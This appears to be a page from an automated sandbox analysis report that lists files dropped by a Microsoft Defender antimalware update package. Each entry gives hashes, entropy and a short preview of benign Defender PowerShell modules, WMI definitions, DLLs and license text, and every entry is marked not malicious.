Preview:	## Copyright (c) Microsoft Corporation. All rights reserved.....<#...SYNOPSIS..This cmdlet collects a performance recording of Microsoft Defender Antivirus..scans......DESCRIPTION..This cmdlet collects a performance recording of Microsoft Defender Antivirus..scans. These performance recordings contain Microsoft-Antimalware-Engine..and NT kernel process events and can be analyzed after collection using the..Get-MpPerformanceReport cmdlet.....This cmdlet requires elevated administrator privileges.....The performance analyzer provides insight into problematic files that could..cause performance degradation of Microsoft Defender Antivirus. This tool is..provided "AS IS", and is not intended to provide suggestions on exclusions...Exclusions can reduce the level of protection on your endpoints. Exclusions,..if any, should be defined with caution......EXAMPLE..New-MpPerformanceRecording -RecordTo:.\Defender-scans.etl....#>..function New-MpPerformanceRecording {.. [CmdletBinding()].. par

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpPerformanceRecording.wprp Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text
Category:	modified
Size (bytes):	4971
Entropy (8bit):	4.542570045638256
Encrypted:	false
SSDEEP:	96:aAPEP3EPGEPJuDhDEMTRBTCq6IQEPvAwWSJNLKI+EPZMhkvyXHkJi2eEPZMUkvy/:aAcPUPpPJfMTRBTr6ILPvAwW6NRPZMh2
MD5:	990729AD92C1325C42B04BC975ECBD57
SHA1:	1CDBE901753CCE8D933DF8D50507CE16A25AA428
SHA-256:	E796454FEE4CF17EFDC25DB5FEEF00A5D7C1B335E6C4B4FE996E8AD7CAB01BC8
SHA-512:	EA0BCD6122068DA9412E5195C7AA3017C187790C790197AC5AF129F3ACF6C23780169C0165627E5C55CB3B99E6931CB18A42E61701C647FF07EAF6DA2740DAEB
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8" standalone='yes'?>..<WindowsPerformanceRecorder Version="1.0" Author="Microsoft Defender for Endpoint" Team="Microsoft Defender for Endpoint" Comments="Microsoft Defender for Endpoint Scan performance tracing" Company="Microsoft Corporation" Copyright="Microsoft Corporation">. <Profiles>. System Providers -->.. <SystemProvider Id="SystemProvider_Scans_Light">. <Keywords>. <Keyword Value="CpuConfig" />. <Keyword Value="ProcessThread" />. <Keyword Value="ProcessCounter" />. </Keywords>. </SystemProvider>.. <SystemProvider Id="SystemProvider_Scans_Verbose" Base="SystemProvider_Scans_Light">. <Keywords Operation="Add">. <Keyword Value="Loader" />. <Keyword Value="SampledProfile"/>. </Keywords>. <Stacks>. <Stack Value="SampledProfile"/>. </Stacks>. </Syste

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpPerformanceReport.Format.ps1xml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	61966
Entropy (8bit):	4.530280013007693
Encrypted:	false
SSDEEP:	768:Bw2C10m6YQzHY80tQcd02cYVWVc80Bv/C:Bw2CTVtZk
MD5:	C9734A297293CCE204D369DD392EDDC9
SHA1:	83C091027F5BE029364DBB6C9D32BB294BC6579A
SHA-256:	CDF89F9602942969AE0493769EAC7DAA8022A1E8295D49403F1206615F92071A
SHA-512:	C474FB8F33E56DE45CB481CF921C9C21019F7610A35405BF16736A8A9C51901E750427E73271580FD1D169271DEB24A4BF1DFF130B76F26870EB4A5BE6201A7F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<Configuration>.. <ViewDefinitions>.. <View>.. <Name>default</Name>.. <ViewSelectedBy>.. <TypeName>MpPerformanceReport.Result</TypeName>.. <TypeName>Deserialized.MpPerformanceReport.Result</TypeName>.. </ViewSelectedBy>.. <CustomControl>.. <CustomEntries>.. <CustomEntry>.. <CustomItem>.. <ExpressionBinding>.. <PropertyName>TopFiles</PropertyName>.. <ItemSelectionCondition>.. <ScriptBlock>($_ \| gm -Name:'TopFiles' -MemberType:NoteProperty).Count -gt 0</ScriptBlock>.. </ItemSelectionCondition>.. <CustomControl>.. <CustomEntries>.. <CustomEntry>.. <CustomItem>.. <NewLine />.. <Text>TopFiles</Text>.. <NewLine />.. <Text>========</Text>..

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpPreference.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	112029
Entropy (8bit):	4.059259917659887
Encrypted:	false
SSDEEP:	768:5ouSOD2TIBNoNejxo98U0m6YQzHY80tQ4TQWjL+6SNSIZFvnAStOp:5pSODnBNUejx3mVt1LBuA7
MD5:	710B025F9E1944FDB020F27389A2E8B3
SHA1:	C8CB55361A6F483CD6B464C5364ED091AFE46DD3
SHA-256:	AA9021CFDC42493E2A759BAD0159001FFB12110FF83CD16021E57570E6402805
SHA-512:	C01AD9EB3B6394192E69F3C14A9BB5B266F04213B687D754E41D8DA080F2BFD3333ED970A4EBC04E0B657ECF7DBA8D7C44F2AC99857DA5A0A25E05FE3A79329E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="root\Microsoft\Windows\Defender\MSFT_MpPreference" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpPreference</DefaultNoun>.. <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. </GetCmdletParameters>.. </InstanceCmdlets>.... <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Set" />.. <Method MethodName="Set">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue>.. <Parameters>.. <Parameter ParameterName="ExclusionPath">..

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpScan.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15262
Entropy (8bit):	5.965807864910325
Encrypted:	false
SSDEEP:	384:7DORD5N4I0m6YBOzHQV80tQEFl3uN+HzbycVZ1gX5BRpBbpm39B4:K0m6YQzHY80tQpNWfgBHBo39B4
MD5:	7528936578CAEAEFE7B398C8EF4E0A47
SHA1:	9BBABA934E9C442A4630233D3BE04A4D4333E352
SHA-256:	A51C86EFD506A132274C37E288B9B697BC865F14D6D6451DA7399C7B5F36751F
SHA-512:	13D7B389428D07A7D33CBC0276919A601C686CF4A0E99059AF1D81AC0784EE61DFC5354E80D3D6E2B6E801769968980B828ACC5DC1885E6CBE73A2941D3823AC
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpScan" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpScan</DefaultNoun>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Start" />.. <Method MethodName="Start">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue>.. <Parameters>.. <Parameter ParameterName="ScanPath">.. <Type PSType="System.String" />.. <CmdletParameterMetadata>.. <ValidateNotNull />.. <ValidateNotNullOrEmpty />.. </CmdletParameterMetadata>.. </Parameter>.. <Parameter ParameterName="ScanType">.. <Type PSType="MpScan.ScanType

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpSignature.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15262
Entropy (8bit):	5.966711820105084
Encrypted:	false
SSDEEP:	384:E6D5YR4l0m6YBOzHQV80tQEFekIqeYQXCSPmTmSI4ElIOhalPvnAS/M0b5hsPDG:B0m6YQzHY80tQjqeYQSSO6SmIZFvnASn
MD5:	A212A25B0FA39ACB5D3F02E1CC622730
SHA1:	77846568863D3AEF5453AEF81C4302DD3F7C87BB
SHA-256:	6A8DC2AA231D974A36E0EC86751139873226D6157232EDB63AFB2AEB110CD8F5
SHA-512:	EBE171D29147429ABD182BE10174FE498EECA6D91D8DB8D9A55511E37C6E42F797A1D80892D95A61A116BCFB73DB99CEB0CC2B3365F0506ABF555E6FE80B7503
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpSignature" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpSignature</DefaultNoun>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Update" />.. <Method MethodName="Update">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue>.. <Parameters>.. <Parameter ParameterName="UpdateSource">.. <Type PSType="MpSignature.UpdateSource" />.. <CmdletParameterMetadata>.. <AllowEmptyString />.. <AllowNull />.. <ValidateNotNull />.. <ValidateNotNullOrEmpty />.. <ValidateSet>.. <AllowedValue>In

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpThreat.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	14872
Entropy (8bit):	5.9567543836192955
Encrypted:	false
SSDEEP:	384:T50m6YBOzHQV80tQEFlS+yB+HzbycVZ1gX5BRpBbpmUBv/:l0m6YQzHY80tQUaWfgBHBoUBv/
MD5:	CF0F8A1D51777BDD9D08FEB023A2162A
SHA1:	47066E1FEB3C61779CC76CB52BE02148FC149CDF
SHA-256:	CFFD2BA2255685803B32ADE8D2D238A07AAEB8071EA04BCBB75CE0EF61FE9AE7
SHA-512:	B49A361319B5EA816C1FABB831C6B43C761427D7913D18E2D94AB4FE181A89394B5ADE044C1E9672FAF7B4B15D73F305CB0A8CFD8965348AD292DFD2257D99A8
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpThreat" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpThreat</DefaultNoun>.. <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. <QueryableProperties>.. <Property PropertyName="ThreatID">.. <Type PSType="int64" />.. <RegularQuery>.. <CmdletParameterMetadata IsMandatory="false" Aliases="ID".. CmdletParameterSets="ById" />.. </RegularQuery>.. </Property>.. </QueryableProperties>.. </GetCmdletParameters>.. </InstanceCmdlets>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Remov

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpThreatCatalog.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	14359
Entropy (8bit):	5.974349558252268
Encrypted:	false
SSDEEP:	384:K0m6YBOzHQV80tQEFtVSderomWQfUCzuMKqbeUs:K0m6YQzHY80tQaS6omlfUCqMKqVs
MD5:	125B977FF0EE6A36452A2B6FD5AE2316
SHA1:	0C76D5588B36B5A9BFA5F2E3DD64CEA80FB1930D
SHA-256:	7856F35EB7FB72BBF8CAAAC05FD99CEE139F694209BCFBCA41AEB4C3B4CD2413
SHA-512:	9B9E246807F2890B9530197C5EFC8B236C2E11D2B616BE3E6DC813E9F8984197759A77AC73B8D8AF5FF9C13CBB370980B6DDC768281C4E38FF51CACF0D2E2B27
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpThreatCatalog" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpThreatCatalog</DefaultNoun>.. <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. <QueryableProperties>.. <Property PropertyName="ThreatID">.. <Type PSType="int64" />.. <RegularQuery>.. <CmdletParameterMetadata IsMandatory="false" Aliases="ID".. CmdletParameterSets="ById" />.. </RegularQuery>.. </Property>.. </QueryableProperties>.. </GetCmdletParameters>.. </InstanceCmdlets>.. </Class>..</PowerShellMetadata>.. SIG # Begin signature block -->.. MIIhXAYJKoZIhvcNAQcCoI

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpThreatDetection.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	14398
Entropy (8bit):	5.977177438588654
Encrypted:	false
SSDEEP:	384:M0m6YBOzHQV80tQEFubg1+/pjK02JsuVRqikVcqgyOTx0vz:M0m6YQzHY80tQt3/M02JVWVcqHSxY
MD5:	7C91EEB90EFFB9A8D11DF34FA04FB359
SHA1:	BDFD38D168DBD76C7EC1045B8C15AFD1D6905C74
SHA-256:	97DF56A7933A45143233D314EA947801BF0A475D55A9D852FB411FFD98CB4123
SHA-512:	141BF2F83BE8728B1480469830AD0B7BD3F2E32A1EDF58EA528C26576E0E4BB5510F64B994D6A4C337EB537CB40AC78D3329637184D844BAFF0FC88CA24CF865
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpThreatDetection" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpThreatDetection</DefaultNoun>.. <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. <QueryableProperties>.. <Property PropertyName="ThreatID">.. <Type PSType="int64" />.. <RegularQuery>.. <CmdletParameterMetadata IsMandatory="false" Aliases="ID".. CmdletParameterSets="ById" />.. </RegularQuery>.. </Property>.. </QueryableProperties>.. </GetCmdletParameters>.. </InstanceCmdlets>.. </Class>..</PowerShellMetadata>.. SIG # Begin signature block -->.. MIIhdwYJKoZIhvcNAQcCoIIhaDCCIW

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpWDOScan.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	14145
Entropy (8bit):	5.978998016086098
Encrypted:	false
SSDEEP:	384:LQ0m6YBOzHQV80tQEFl7Qxh34tSZogX5BRpB6WdGtf/P:80m6YQzHY80tQgQx+t6BHBddGtfH
MD5:	0DB7196D0224FBCE614AD6ACA63F8F17
SHA1:	943B7A55F6E584C9BE421871FD4C9E21A0F326EB
SHA-256:	2D87A0FE031420903AE69DB3A30011DC659B489E2B11AA4129FED01ED3F0B00B
SHA-512:	7F9400BDD7DE5F576F6F776F2C0166EB46A68A0040078993574B8226056E419B9C74B738000AFCEC2CFCDD0A5C5CCE3A822DE19E23FEDD63DF47F85755BA1777
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpWDOScan" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpWDOScan</DefaultNoun>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Start" />.. <Method MethodName="Start">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue> .. </Method>.. </Cmdlet>.. </StaticCmdlets>.. </Class> ..</PowerShellMetadata>.. SIG # Begin signature block -->.. MIIhXgYJKoZIhvcNAQcCoIIhTzCCIUsCAQExDzANBglghkgBZQMEAgEFADB5Bgor -->.. BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG -->.. KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBzAXdbBfjvkCEN -->.. qK7Ym3r0lwef2vQhN9zidTDdkf

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ProtectionManagement.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	725240
Entropy (8bit):	6.056118316914494
Encrypted:	false
SSDEEP:	12288:UqjFjzbVd9Y5TFXnu5aHOf/gehVtN41D3mRy46WegMZ2:XjzbV7Y5BUlN4t2Ry6Ug
MD5:	0F9485E242400DC47A9FCA73A3443120
SHA1:	1BD457062BE7B37EAA252C238A9B3BF4EFFF0485
SHA-256:	8DA908D6AD4F307D6AAF8CFB1A9C27B3F3A285F84B1F3C817F50D7B154DC575F
SHA-512:	B2A83A997985CC7FC5D07705E49BCC96BD9E0382CD4BB722C4EBBA3B35EE793C6507DA94AF23B276CB0808FEB7233A37A7F72CCF5974AE607186831AA5EE5C10
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................V...........V.....V.....V..J................%..........Rich...........PE..d...O.5..........." .....`.........................................................U<....`A..........................................................X....P...O....... .......F..<...p.......................(.......8...................t........................text...UX.......`.................. ..`.rdata..vI...p...P...p..............@..@.data...T........p..................@....pdata...O...P...P...0..............@..@.didat..............................@....rsrc...X...........................@..@.reloc...F.......P..................@..B................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ProtectionManagement.mof Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	C source, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	91754
Entropy (8bit):	3.59234124916807
Encrypted:	false
SSDEEP:	768:lv7JczQMzhFbvZbY6qyZ+v7JczQMzhFbvZbY6qyZg:RMhWyUMhWya
MD5:	D9619BB89523F47C88DC5FC8BEA50BA0
SHA1:	279098ECBF269FC91585A8D0F7F5A1C72AD2101D
SHA-256:	3ECDCEF5A04C90CA1EB296F3AE4F1C5BC96C371E84BE927C25FA64D6C74C34AF
SHA-512:	F110C9824D5CA8718A4EDA5968DC7DEA7B1C88A498CA2F7706D873D3B6C87FACF8E2ABE7BA20BEF033B8D0322E790C3B0F8CE288166635AE11857B367B9BB9F7
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .a.u.t.o.r.e.c.o.v.e.r.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).........I.n.s.t.a.n.c.e. .o.f. ._._.W.i.n.3.2.P.r.o.v.i.d.e.r. .a.s. .$.p.r.o.v.....{..... . .N.a.m.e. .=. .".P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.".;..... . .C.l.s.I.d. .=. .".{.A.7.C.4.5.2.E.F.-.8.E.9.F.-.4.2.E.B.-.9.F.2.B.-.2.4.5.6.1.3.C.A.0.D.C.9.}.".;..... . .I.m.p.e.r.s.o.n.a.t.i.o.n.L.e.v.e.l. .=. .1.;..... . .H.o.s.t.i.n.g.M.o.d.e.l. .=. .".L.o.c.a.l.S.e.r.v.i.c.e.H.o.s.t.".;..... . .v.e.r.s.i.o.n. .=. .1.0.7.3.7.4.1.8.2.5.;.....}.;.........I.n.s.t.a.n.c.e. .o.f. ._._.M.e.t.h.o.d.P.r.o.v.i.d.e.r.R.e.g.i.s.t.r.a.t.i.o.n.....{..... . .P.r.o.v.i.d.e.r. .=. .$.p.r.o.v.;.....}.;.........I.n.s.t.a.n.c.e. .o.f. ._._.E.v.e.n.t.P.r.o.v.i.d.e.r.R.e.g.i.s.t.r.a.t.i.o.n.....{..... . .P.r.o.v.i.d.e.r. .=. .$.p.r.o.v.;..... . .e.v.e.n.t.Q.u.e.r.y.L.i.s.t. .=. .{.".s.e.l.e.c.t. .*. .f.r.o.m. .M.S.F.T._.M.p.E.v.e.n.t.".}.;...

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ProtectionManagement_uninstall.mof Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	C source, Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	2570
Entropy (8bit):	3.4549784303178717
Encrypted:	false
SSDEEP:	24:QXbclfUWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzfWvlDQzyWvlDQzEWvl5:eTjDGwJ3r24RFZ7a2la2Sa2mWaWP
MD5:	72D045707D108D55B76CD70AD9A84AD6
SHA1:	8FE25F4F289302A49CF2FA0F962FEA4D7D82FB8A
SHA-256:	30A0AD834D7B3F4FB47010B4BB6905576792E83064E9DD858EABF0CCA17FC3DF
SHA-512:	E3C6F3F931AEFCF1F0B1061B7355451692AF1F459F8ED13C39B03951A6A3E833AEBB1031796B5D806C615D3E84C178D628B10AB5EC5CCBC50935CBB0D584FA50
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e. .(. .".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).........#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.E.v.e.n.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.H.e.a.r.t.B.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.P.r.e.f.e.r.e.n.c.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.c.a.n.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.i.g.n.a.t.u.r.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.C.a.t.a.l.o.g.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.D.e.t.e.c.t.i.o.n.".,.n.o.f.a.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ThirdPartyNotices.txt Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6717
Entropy (8bit):	5.162252158398129
Encrypted:	false
SSDEEP:	96:+WRspYDLPkQHFom1DW4DlHFposoSKYax9gDCk4Cp1PRsQHdBLe:DaVQHFB0AlHISKYoopoQHdxe
MD5:	CE7313760386B6ABDE405F9B9E6EA51D
SHA1:	F969931AC45991F7ECB6767A69433A7082ECCA2F
SHA-256:	73E26404B3571A9E859B3A1144F54C353172479586E0A23C3A7DDA0C1C0AE919
SHA-512:	CF990FC05FD3ED78FF35F1A1ACD5317626D46745BF7E4F8C62AA068A587ABF52F232080464F82692A2BB8C04A4FFA53599B933A4281BC7E697337720DB65BF29
Malicious:	false
Preview:	===============================================================================..1. C++ REST SDK (https://github.com/Microsoft/cpprestsdk).... C++ REST SDK ....The MIT License (MIT)....Copyright (c) Microsoft Corporation....All rights reserved.....Permission is hereby granted, free of charge, to any person obtaining a copy of..this software and associated documentation files (the "Software"), to deal in..the Software without restriction, including without limitation the rights to..use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of..the Software, and to permit persons to whom the Software is furnished to do so,..subject to the following conditions:....The above copyright notice and this permission notice shall be included in all..copies or substantial portions of the Software.....THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR..IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,..FITNESS FOR A PARTICULAR PURPO

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\af-ZA\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29928
Entropy (8bit):	4.969613819843474
Encrypted:	false
SSDEEP:	384:7r/SmH7frhpOJsSYNEYffu1vB+sEqEKSTs/WS8/WWRDBRJZ4UslGsV7:7rbHnZNEYfPDR1PV8
MD5:	2A54A6EFE0D70D2F8120E4F9AE10F2AE
SHA1:	35DD602C81E5E1E086C093BB3C3F97CC68FA2FD6
SHA-256:	F90B4913826DA577A68006FC7211E2390534BE9639934AFC5A375436373B1C71
SHA-512:	8AE2DCEEF670F26A753B1525FD126DC4748A5124B94F5B8ECB632E2A55A2B3C709146C40C936806CCFC64B804A1FF23E31C47293ECD4FF524F5CDC86320D205F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........R...............................................p......*.....@.......................................... ..DN...........T... ...........................................................................................rdata..p...........................@..@.rsrc...DN... ...P..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...I...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\am-ET\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22264
Entropy (8bit):	6.043832073272478
Encrypted:	false
SSDEEP:	384:7raKntNfzRKLpPExWUN7W0WVQB82s/BW/pQWS8/W4RDBRJvsl5D2:7r1ntNfzRKLpcjfRxR1Pl
MD5:	F5F731716CA6C6CEFF57DEE03EB33376
SHA1:	FA71CD3569AD3C6518E626E09965053F58AB6D9D
SHA-256:	A2E33041860906CEF0BCE5B2F3FD2AF88E3DB61E97FF9EB16D650CAD1F69F708
SHA-512:	FCCD58F3A698CE9668322C76140E8FE55B2F484962D1A9B51828C00C3CD888D85EA83D3626993B50098271B250DDE6783FA129E5225153112781D5565313553F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........4...............................................`............@.......................................... ...1...........6... ...........................................................................................rdata..p...........................@..@.rsrc....1... ...2..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...-...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ar-SA\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
